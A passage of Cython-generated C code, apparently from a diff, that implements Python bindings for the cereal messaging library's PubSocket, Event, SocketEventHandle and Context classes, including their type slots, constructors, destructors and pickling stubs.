*__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_11__reduce_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__reduce_cython__ (wrapper)", 0); + if (unlikely(__pyx_nargs > 0)) { + __Pyx_RaiseArgtupleInvalid("__reduce_cython__", 1, 0, 0, __pyx_nargs); return NULL;} + if (unlikely(__pyx_kwds) && __Pyx_NumKwargs_FASTCALL(__pyx_kwds) && unlikely(!__Pyx_CheckKeywordStrings(__pyx_kwds, "__reduce_cython__", 0))) return NULL; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_10__reduce_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *)__pyx_v_self)); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_10__reduce_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__reduce_cython__", 0); + + /* "(tree fragment)":2 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 2, __pyx_L1_error) + + /* "(tree fragment)":1 + * def __reduce_cython__(self): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.__reduce_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_13__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6cereal_9messaging_13messaging_pyx_9PubSocket_13__setstate_cython__ = {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_13__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6cereal_9messaging_13messaging_pyx_9PubSocket_13__setstate_cython__(PyObject *__pyx_v_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + CYTHON_UNUSED PyObject *__pyx_v___pyx_state = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("__setstate_cython__ (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pyx_state,0}; + PyObject* values[1] = {0}; + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pyx_state)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(1, 3, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "__setstate_cython__") < 0)) __PYX_ERR(1, 3, __pyx_L3_error) + } + } else if (unlikely(__pyx_nargs != 1)) { + goto __pyx_L5_argtuple_error; + } else { + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + } + __pyx_v___pyx_state = values[0]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("__setstate_cython__", 1, 1, 1, __pyx_nargs); __PYX_ERR(1, 3, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_12__setstate_cython__(((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6cereal_9messaging_13messaging_pyx_9PubSocket_12__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6cereal_9messaging_13messaging_pyx_PubSocket *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("cereal.messaging.messaging_pyx.PubSocket.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} +static struct __pyx_vtabstruct_6cereal_9messaging_13messaging_pyx_Event __pyx_vtable_6cereal_9messaging_13messaging_pyx_Event; + +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Event(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *p; + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + p = ((struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)o); + p->__pyx_vtab = __pyx_vtabptr_6cereal_9messaging_13messaging_pyx_Event; + new((void*)&(p->event)) Event(); + if (unlikely(__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_1__cinit__(o, __pyx_empty_tuple, NULL) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Event(PyObject *o) { + struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *p = (struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event *)o; + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Event) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + __Pyx_call_destructor(p->event); + (*Py_TYPE(o)->tp_free)(o); +} + +static PyObject *__pyx_getprop_6cereal_9messaging_13messaging_pyx_5Event_fd(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_2fd_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9messaging_13messaging_pyx_5Event_ptr(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_3ptr_1__get__(o); +} + +static PyMethodDef __pyx_methods_6cereal_9messaging_13messaging_pyx_Event[] = { + {"set", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_3set, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"clear", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_5clear, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"wait", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_7wait, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"peek", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_9peek, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_11__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_5Event_13__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_6cereal_9messaging_13messaging_pyx_Event[] = { + {(char *)"fd", __pyx_getprop_6cereal_9messaging_13messaging_pyx_5Event_fd, 0, (char *)0, 0}, + {(char *)"ptr", __pyx_getprop_6cereal_9messaging_13messaging_pyx_5Event_ptr, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9messaging_13messaging_pyx_Event_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Event}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9messaging_13messaging_pyx_Event}, + {Py_tp_getset, (void *)__pyx_getsets_6cereal_9messaging_13messaging_pyx_Event}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Event}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9messaging_13messaging_pyx_Event_spec = { + "cereal.messaging.messaging_pyx.Event", + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6cereal_9messaging_13messaging_pyx_Event_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9messaging_13messaging_pyx_Event = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.messaging.messaging_pyx.""Event", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Event), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Event, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9messaging_13messaging_pyx_Event, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_6cereal_9messaging_13messaging_pyx_Event, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9messaging_13messaging_pyx_Event, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_SocketEventHandle(PyTypeObject *t, PyObject *a, PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + if (unlikely(__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_1__cinit__(o, a, k) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_SocketEventHandle(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_SocketEventHandle) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_3__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + (*Py_TYPE(o)->tp_free)(o); +} + +static PyObject *__pyx_getprop_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_enabled(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_1__get__(o); +} + +static int __pyx_setprop_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_enabled(PyObject *o, PyObject *v, CYTHON_UNUSED void *x) { + if (v) { + return __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7enabled_3__set__(o, v); + } + else { + PyErr_SetString(PyExc_NotImplementedError, "__del__"); + return -1; + } +} + +static PyObject *__pyx_getprop_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_recv_called_event(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_17recv_called_event_1__get__(o); +} + +static PyObject *__pyx_getprop_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_recv_ready_event(PyObject *o, CYTHON_UNUSED void *x) { + return __pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_16recv_ready_event_1__get__(o); +} + +static PyMethodDef __pyx_methods_6cereal_9messaging_13messaging_pyx_SocketEventHandle[] = { + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_5__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_7__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; + +static struct PyGetSetDef __pyx_getsets_6cereal_9messaging_13messaging_pyx_SocketEventHandle[] = { + {(char *)"enabled", __pyx_getprop_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_enabled, __pyx_setprop_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_enabled, (char *)0, 0}, + {(char *)"recv_called_event", __pyx_getprop_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_recv_called_event, 0, (char *)0, 0}, + {(char *)"recv_ready_event", __pyx_getprop_6cereal_9messaging_13messaging_pyx_17SocketEventHandle_recv_ready_event, 0, (char *)0, 0}, + {0, 0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_SocketEventHandle}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9messaging_13messaging_pyx_SocketEventHandle}, + {Py_tp_getset, (void *)__pyx_getsets_6cereal_9messaging_13messaging_pyx_SocketEventHandle}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9messaging_13messaging_pyx_SocketEventHandle}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle_spec = { + "cereal.messaging.messaging_pyx.SocketEventHandle", + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9messaging_13messaging_pyx_SocketEventHandle = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.messaging.messaging_pyx.""SocketEventHandle", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_SocketEventHandle), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_SocketEventHandle, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, /*tp_setattro*/ + 0, /*tp_as_buffer*/ + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, /*tp_flags*/ + 0, /*tp_doc*/ + 0, /*tp_traverse*/ + 0, /*tp_clear*/ + 0, /*tp_richcompare*/ + 0, /*tp_weaklistoffset*/ + 0, /*tp_iter*/ + 0, /*tp_iternext*/ + __pyx_methods_6cereal_9messaging_13messaging_pyx_SocketEventHandle, /*tp_methods*/ + 0, /*tp_members*/ + __pyx_getsets_6cereal_9messaging_13messaging_pyx_SocketEventHandle, /*tp_getset*/ + 0, /*tp_base*/ + 0, /*tp_dict*/ + 0, /*tp_descr_get*/ + 0, /*tp_descr_set*/ + #if !CYTHON_USE_TYPE_SPECS + 0, /*tp_dictoffset*/ + #endif + 0, /*tp_init*/ + 0, /*tp_alloc*/ + __pyx_tp_new_6cereal_9messaging_13messaging_pyx_SocketEventHandle, /*tp_new*/ + 0, /*tp_free*/ + 0, /*tp_is_gc*/ + 0, /*tp_bases*/ + 0, /*tp_mro*/ + 0, /*tp_cache*/ + 0, /*tp_subclasses*/ + 0, /*tp_weaklist*/ + 0, /*tp_del*/ + 0, /*tp_version_tag*/ + #if PY_VERSION_HEX >= 0x030400a1 + #if CYTHON_USE_TP_FINALIZE + 0, /*tp_finalize*/ + #else + NULL, /*tp_finalize*/ + #endif + #endif + #if PY_VERSION_HEX >= 0x030800b1 && (!CYTHON_COMPILING_IN_PYPY || PYPY_VERSION_NUM >= 0x07030800) + 0, /*tp_vectorcall*/ + #endif + #if __PYX_NEED_TP_PRINT_SLOT == 1 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030C0000 + 0, /*tp_watched*/ + #endif + #if CYTHON_COMPILING_IN_PYPY && PY_VERSION_HEX >= 0x03090000 && PY_VERSION_HEX < 0x030a0000 + 0, /*tp_pypy_flags*/ + #endif +}; +#endif + +static PyObject *__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Context(PyTypeObject *t, CYTHON_UNUSED PyObject *a, CYTHON_UNUSED PyObject *k) { + PyObject *o; + #if CYTHON_COMPILING_IN_LIMITED_API + allocfunc alloc_func = (allocfunc)PyType_GetSlot(t, Py_tp_alloc); + o = alloc_func(t, 0); + #else + if (likely(!__Pyx_PyType_HasFeature(t, Py_TPFLAGS_IS_ABSTRACT))) { + o = (*t->tp_alloc)(t, 0); + } else { + o = (PyObject *) PyBaseObject_Type.tp_new(t, __pyx_empty_tuple, 0); + } + if (unlikely(!o)) return 0; + #endif + if (unlikely(__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_1__cinit__(o, __pyx_empty_tuple, NULL) < 0)) goto bad; + return o; + bad: + Py_DECREF(o); o = 0; + return NULL; +} + +static void __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Context(PyObject *o) { + #if CYTHON_USE_TP_FINALIZE + if (unlikely((PY_VERSION_HEX >= 0x03080000 || __Pyx_PyType_HasFeature(Py_TYPE(o), Py_TPFLAGS_HAVE_FINALIZE)) && __Pyx_PyObject_GetSlot(o, tp_finalize, destructor)) && (!PyType_IS_GC(Py_TYPE(o)) || !__Pyx_PyObject_GC_IsFinalized(o))) { + if (__Pyx_PyObject_GetSlot(o, tp_dealloc, destructor) == __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Context) { + if (PyObject_CallFinalizerFromDealloc(o)) return; + } + } + #endif + { + PyObject *etype, *eval, *etb; + PyErr_Fetch(&etype, &eval, &etb); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) + 1); + __pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_5__dealloc__(o); + __Pyx_SET_REFCNT(o, Py_REFCNT(o) - 1); + PyErr_Restore(etype, eval, etb); + } + (*Py_TYPE(o)->tp_free)(o); +} + +static PyMethodDef __pyx_methods_6cereal_9messaging_13messaging_pyx_Context[] = { + {"term", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_3term, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__reduce_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_7__reduce_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {"__setstate_cython__", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6cereal_9messaging_13messaging_pyx_7Context_9__setstate_cython__, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}, + {0, 0, 0, 0} +}; +#if CYTHON_USE_TYPE_SPECS +static PyType_Slot __pyx_type_6cereal_9messaging_13messaging_pyx_Context_slots[] = { + {Py_tp_dealloc, (void *)__pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Context}, + {Py_tp_methods, (void *)__pyx_methods_6cereal_9messaging_13messaging_pyx_Context}, + {Py_tp_new, (void *)__pyx_tp_new_6cereal_9messaging_13messaging_pyx_Context}, + {0, 0}, +}; +static PyType_Spec __pyx_type_6cereal_9messaging_13messaging_pyx_Context_spec = { + "cereal.messaging.messaging_pyx.Context", + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context), + 0, + Py_TPFLAGS_DEFAULT|Py_TPFLAGS_HAVE_VERSION_TAG|Py_TPFLAGS_CHECKTYPES|Py_TPFLAGS_HAVE_NEWBUFFER|Py_TPFLAGS_BASETYPE, + __pyx_type_6cereal_9messaging_13messaging_pyx_Context_slots, +}; +#else + +static PyTypeObject __pyx_type_6cereal_9messaging_13messaging_pyx_Context = { + PyVarObject_HEAD_INIT(0, 0) + "cereal.messaging.messaging_pyx.""Context", /*tp_name*/ + sizeof(struct __pyx_obj_6cereal_9messaging_13messaging_pyx_Context), /*tp_basicsize*/ + 0, /*tp_itemsize*/ + __pyx_tp_dealloc_6cereal_9messaging_13messaging_pyx_Context, /*tp_dealloc*/ + #if PY_VERSION_HEX < 0x030800b4 + 0, /*tp_print*/ + #endif + #if PY_VERSION_HEX >= 0x030800b4 + 0, /*tp_vectorcall_offset*/ + #endif + 0, /*tp_getattr*/ + 0, /*tp_setattr*/ + #if PY_MAJOR_VERSION < 3 + 0, /*tp_compare*/ + #endif + #if PY_MAJOR_VERSION >= 3 + 0, /*tp_as_async*/ + #endif + 0, /*tp_repr*/ + 0, /*tp_as_number*/ + 0, /*tp_as_sequence*/ + 0, /*tp_as_mapping*/ + 0, /*tp_hash*/ + 0, /*tp_call*/ + 0, /*tp_str*/ + 0, /*tp_getattro*/ + 0, 